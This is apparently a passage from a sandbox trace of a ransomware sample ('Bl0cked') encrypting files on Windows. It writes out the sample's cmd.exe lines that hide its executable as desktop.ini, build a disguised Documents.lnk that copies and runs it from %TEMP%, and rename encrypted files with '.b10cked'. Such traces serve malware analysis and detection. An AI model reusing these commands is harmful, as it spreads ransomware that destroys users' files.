"c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), lpNewFileName="C:\\Users\\EEBsYm5\\Documents\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\documents\\bl0cked-readme.rtf"), bFailIfExists=0) returned 1 [0129.299] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\documents\\bl0cked-readme.rtf")) returned 0x20 [0129.299] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0129.299] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0129.299] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0129.299] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0129.299] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe") returned 0x36 [0129.299] CharUpperBuffW (in: lpsz="attrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"[FROM_PATH]\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"", cchLength=0x87 | out: lpsz="ATTRIB -R -S -H \"[TO_PATH]\" & DEL /F /Q \"[TO_PATH]\" & TYPE \"[FROM_PATH]\" > \"[TO_PATH]\" && ATTRIB +H \"[TO_PATH]\" && ATTRIB +H \"[TO_DIR]\"") returned 0x87 [0129.299] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0129.299] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\", lpszShortPath=0x123027c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\") returned 0x1a [0129.299] CharUpperBuffW (in: lpsz="attrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"", cchLength=0xb2 | out: lpsz="ATTRIB -R -S -H \"[TO_PATH]\" & DEL /F /Q \"[TO_PATH]\" & TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"[TO_PATH]\" && ATTRIB +H \"[TO_PATH]\" && ATTRIB +H \"[TO_DIR]\"") returned 0xb2 [0129.299] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0129.299] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1") returned 0x19 [0129.300] CharUpperBuffW (in: lpsz="attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\DOCUME~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\desktop.ini\" && attrib +h \"[TO_DIR]\"", cchLength=0x122 | out: lpsz="ATTRIB -R -S -H \"C:\\USERS\\EEBSYM5\\DOCUME~1\\DESKTOP.INI\" & DEL /F /Q \"C:\\USERS\\EEBSYM5\\DOCUME~1\\DESKTOP.INI\" & TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"C:\\USERS\\EEBSYM5\\DOCUME~1\\DESKTOP.INI\" && ATTRIB +H \"C:\\USERS\\EEBSYM5\\DOCUME~1\\DESKTOP.INI\" && ATTRIB +H \"[TO_DIR]\"") returned 0x122 [0129.300] CharUpperBuffW (in: lpsz="[TO_DIR]", cchLength=0x8 | out: lpsz="[TO_DIR]") returned 0x8 [0129.300] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\DOCUME~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb88*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb78 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\DOCUME~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\"", lpProcessInformation=0x12fb78*(hProcess=0x114, hThread=0x110, dwProcessId=0x8d4, dwThreadId=0x8d0)) returned 1 [0129.315] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0xffffffff) returned 0x0 [0130.380] CloseHandle (hObject=0x114) returned 1 [0130.380] CloseHandle (hObject=0x110) returned 1 [0130.380] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0130.380] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0130.380] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0130.381] GetTickCount () returned 0x29a3b [0130.381] QueryPerformanceCounter (in: lpPerformanceCount=0x12fbfc | out: lpPerformanceCount=0x12fbfc*=18716976962) returned 1 [0130.381] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x56\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0130.381] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x77\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0130.381] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x31\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0130.381] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x45\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0130.381] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x77\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0130.381] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x41\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0130.381] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x7a\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0130.381] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x6a\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0130.381] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0130.381] CharUpperBuffW (in: lpsz="explorer.exe \"[DIR_NAME]\" & type \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x65 | out: lpsz="EXPLORER.EXE \"[DIR_NAME]\" & TYPE \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x65 [0130.381] CharUpperBuffW (in: lpsz="[DIR_NAME]", cchLength=0xa | out: lpsz="[DIR_NAME]") returned 0xa [0130.381] CharUpperBuffW (in: lpsz="explorer.exe \"Documents\" & type \"Documents\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x63 | out: lpsz="EXPLORER.EXE \"DOCUMENTS\" & TYPE \"DOCUMENTS\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x63 [0130.381] CharUpperBuffW (in: lpsz="[HID_NAME]", cchLength=0xa | out: lpsz="[HID_NAME]") returned 0xa [0130.381] CharUpperBuffW (in: lpsz="explorer.exe \"Documents\" & type \"Documents\\desktop.ini\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x64 | out: lpsz="EXPLORER.EXE \"DOCUMENTS\" & TYPE \"DOCUMENTS\\DESKTOP.INI\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x64 [0130.381] CharUpperBuffW (in: lpsz="[EXE_NAME]", cchLength=0xa | out: lpsz="[EXE_NAME]") returned 0xa [0130.381] CoInitialize (pvReserved=0x0) returned 0x0 [0130.382] CoCreateInstance (in: rclsid=0x4e06a4*(Data1=0x21401, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnkOuter=0x0, dwClsContext=0x5, riid=0x4b0dcc*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x12fc10 | out: ppv=0x12fc10*=0x1d3e18) returned 0x0 [0130.383] ShellLink:IUnknown:QueryInterface (in: This=0x1d3e18, riid=0x4d36fc*(Data1=0x214f9, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12fbc8 | out: ppvObject=0x12fbc8*=0x1d3df0) returned 0x0 [0130.383] ShellLink:IUnknown:QueryInterface (in: This=0x1d3e18, riid=0x4d370c*(Data1=0x10b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12fbc8 | out: ppvObject=0x12fbc8*=0x1d3dfc) returned 0x0 [0130.383] ShellLink:IShellLinkW:SetPath (This=0x1d3df0, pszFile="%SystemRoot%\\system32\\cmd.exe") returned 0x0 [0130.385] ShellLink:IShellLinkW:SetArguments (This=0x1d3df0, pszArgs="/C explorer.exe \"Documents\" & type \"Documents\\desktop.ini\" > \"%TEMP%\\Vw1EwAzj.exe\" && \"%TEMP%\\Vw1EwAzj.exe\"") returned 0x0 [0130.385] ShellLink:IShellLinkW:SetWorkingDirectory (This=0x1d3df0, pszDir="%CD%") returned 0x0 [0130.385] ShellLink:IShellLinkW:SetIconLocation (This=0x1d3df0, pszIconPath="%SystemRoot%\\system32\\shell32.dll", iIcon=3) returned 0x0 [0130.385] ShellLink:IShellLinkW:SetShowCmd (This=0x1d3df0, iShowCmd=7) returned 0x0 [0130.385] ShellLink:IPersistFile:Save (This=0x1d3dfc, pszFileName="C:\\Users\\EEBsYm5\\Documents.lnk", fRemember=0) returned 0x0 [0130.393] ShellLink:IUnknown:Release (This=0x1d3dfc) returned 0x2 [0130.393] ShellLink:IUnknown:Release (This=0x1d3df0) returned 0x1 [0130.393] ShellLink:IUnknown:Release (This=0x1d3e18) returned 0x0 [0130.393] CoUninitialize () [0130.394] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0130.394] ReleaseMutex (hMutex=0xf8) returned 1 [0130.394] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0130.394] ReleaseMutex (hMutex=0xf8) returned 1 [0130.394] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0130.394] ReleaseMutex (hMutex=0xf8) returned 1 [0130.394] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0130.394] ReleaseMutex (hMutex=0xf8) returned 1 [0130.394] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\bUW1gWS4k.xlsx" (normalized: "c:\\users\\eebsym5\\documents\\buw1gws4k.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0130.394] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0130.394] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4414 [0130.395] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0130.395] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=18718387460) returned 1 [0130.395] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0130.395] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4414 [0130.395] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0130.395] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0130.395] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4414 [0130.395] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0130.395] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0130.395] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x4414 [0130.395] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0130.395] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0130.395] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4414 [0130.395] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0130.396] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0130.396] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4414 [0130.396] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0130.396] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0130.396] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4414 [0130.396] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0130.396] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0130.396] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4414 [0130.396] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0130.396] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0130.396] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4414 [0130.396] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0130.396] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0130.396] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4414 [0130.396] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0130.396] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x3f2c [0130.396] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0130.398] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0130.398] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0130.398] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x4414 [0130.398] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0130.398] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0130.398] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0130.398] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x4414 [0130.398] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0130.398] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0130.398] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x2209, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x2209, lpOverlapped=0x0) returned 1 [0130.398] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0130.398] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x2209, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x2209, lpOverlapped=0x0) returned 1 [0130.399] SetFilePointer (in: hFile=0x114, lDistanceToMove=-8713, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x220b [0130.399] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x2209, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x2209, lpOverlapped=0x0) returned 1 [0130.399] SetFilePointer (in: hFile=0x114, lDistanceToMove=-8713, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x220b [0130.399] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x2209, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x2209, lpOverlapped=0x0) returned 1 [0130.403] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bUW1gWS4k.xlsx", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0130.403] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bUW1gWS4k.xlsx", cchWideChar=14, lpMultiByteStr=0x131322c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bUW1gWS4k.xlsx", lpUsedDefaultChar=0x0) returned 14 [0130.403] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x4414 [0130.403] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0130.403] CloseHandle (hObject=0x114) returned 1 [0130.404] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\bUW1gWS4k.xlsx", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\BUW1GW~1.XLS") returned 0x26 [0130.404] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\") returned 0x1a [0130.404] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\BUW1GW~1.XLS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\bUW1gWS4k.xlsx.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\BUW1GW~1.XLS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\bUW1gWS4k.xlsx.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x110, hThread=0x114, dwProcessId=0x53c, dwThreadId=0x4e4)) returned 1 [0130.409] CloseHandle (hObject=0x110) returned 1 [0130.409] CloseHandle (hObject=0x114) returned 1 [0130.409] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\", cchLength=0x1b | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\") returned 0x1b [0130.409] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\", cchLength=0x1b | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\") returned 0x1b [0130.409] CompareStringW (Locale=0x400, dwCmpFlags=0x0, 